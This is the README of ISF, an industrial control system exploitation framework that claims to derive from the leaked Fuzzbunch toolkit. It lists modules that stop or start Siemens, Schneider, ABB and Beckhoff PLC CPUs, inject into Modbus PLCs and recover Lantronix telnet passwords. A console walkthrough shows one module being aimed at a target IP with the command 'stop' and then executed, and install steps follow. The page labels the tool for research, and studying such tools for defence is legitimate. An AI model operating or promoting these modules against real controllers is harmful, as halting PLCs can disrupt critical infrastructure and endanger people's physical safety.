Home

Awesome

Industrial Security Exploitation Framework

Python 2.7 License Twitter

一、Overview

ISF(Industrial Security Exploitation Framework) is a exploitation framework based on Python. It's based on NSA Equation Group Fuzzbunch toolkit which is realsed by Shadow Broker. It's developed by the ICSMASTER Security Team. Please use them only for researching purposes.

Read this in other languages: English, 简体中文

二、Requirements

三、Modules

NameDesc
Schneider_CPU_CommandControl Schneider PLC CPU start or stop
Siemens_300_400_CPU_ControlControl Siemens PLC-300 and PLC-400 CPU start or stop
Siemens_1200_CPU_ControlControl Siemens PLC-1200 CPU start or stop
Modbus_PLC_InjecterModbus PLC injecter tools
plcscanModbus and S7 PLC scanner tools
lantronix_telnet_passwordRecover lantronix telnet password
Siemens_1200_ControlControl Siemens PLC

四、Usage

C:\Users\w.hhh>python D:/isf/isf/isf.py
[*] Loading Plugins

                                   ???
                             ???????????????
                          ?????           ?????
                       ????                   ????
                     ????                       ????
                    ???                           ???
                   ???             ??              ???
                  ???           ????????            ???
                 ???           ???????????           ???
                 ???          ?????????????          ???
                 ??          ???????????????          ??
                 ??         ?????????????????         ??
                 ??        ??????       ?????         ??
                 ??            ???????????            ??
                 ??            ???????????            ??
                 ??             ?????????             ??
                 ???             ???????             ???
                 ???              ?????              ???
                  ???          ???????????          ???
                   ???      ?????????????????      ???
                    ???   ????????????????????    ???
                      ?????????????????????????????
                       ???????????????????????????
                          ?????????????????????
                             ---ICSMASTER---

+ - - - - - + [ Version 1.1.1                           ] + - - - - - +
+ - - - - - + [ 6 Touches                               ] + - - - - - +
+ - - - - - + [ 10 Exploits                             ] + - - - - - +
+ - - - - - + [ 15 Payloads                             ] + - - - - - +
+ - - - - - + [ 2 Specials                              ] + - - - - - +
+ - - - - - + [ MADE BY ICSMASTER. HTTP://ICSMASTER.COM ] + - - - - - +

show

Display module:

isf > show

Plugin Categories
=================

  Category     Active Plugin
  --------     -------------
  Exploit      None
  Payload      None
  Special      None
  Touch        None

isf > show Exploit

Plugin Category: Exploit
========================

  Name                            Version
  ----                            -------
  ABB_CPU_Command                 1.1.0
  Beckhoff_CX9020_CPU_Control     1.1.0
  Schneider_CPU_Command           1.1.0
  Siemens_1200_CPU_Control        1.1.0
  Siemens_300_400_CPU_Control     1.1.0

isf >

use

Pick the module:

isf > use Siemens_300_400_CPU_Control

[!] Entering Plugin Context :: Siemens_300_400_CPU_Control
[*] Applying Global Variables

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Siemens_300_400_CPU_Control

Module: Siemens_300_400_CPU_Control
===================================

  Name            Value
  ----            -----
  TargetIp
  TargetPort      102
  Slot            3
  Command         stop

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

info

Display information about exploit:

isf Exploit (Siemens_300_400_CPU_Control) > info

Information
===========

    Name: Siemens_300_400_CPU_Control
 Version: 1.1.0
  Author: w3h
    Type: Exploit


Parameters
==========

  Name            Value      Description
  ----            -----      -----------
  TargetIp                   Target IP Address
  TargetPort      102        Target Port
  Slot            3          The number of slot
  Command         stop       The control command of cpu

set

isf Exploit (Siemens_300_400_CPU_Control) > set TargetIp 127.0.0.1
[+] Set TargetIp => 127.0.0.1

run/execute

Execute the module:

isf Exploit (Siemens_300_400_CPU_Control) > run

[!] Preparing to Execute Siemens_300_400_CPU_Control

Module: Siemens_300_400_CPU_Control
===================================

  Name            Value
  ----            -----
  TargetIp        127.0.0.1
  TargetPort      102
  Slot            3
  Command         stop

[?] Execute Plugin? [Yes] :

五、POC

docs/USAGE.md

六、Installation

Requirements

Installation on OSX

git clone https://github.com/w3h/isf
cd isf
sudo easy_install pip
sudo pip install -r requirements.txt
./isf.py

Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/w3h/isf
cd isf
sudo pip install -r requirements.txt
./isf.py

Installation on Centos 7

sudo yum install python-devel python2-pip ncurses-devel git
git clone https://github.com/w3h/isf
cd isf
pip install -r requirements.txt
./isf.py

Installation on Windows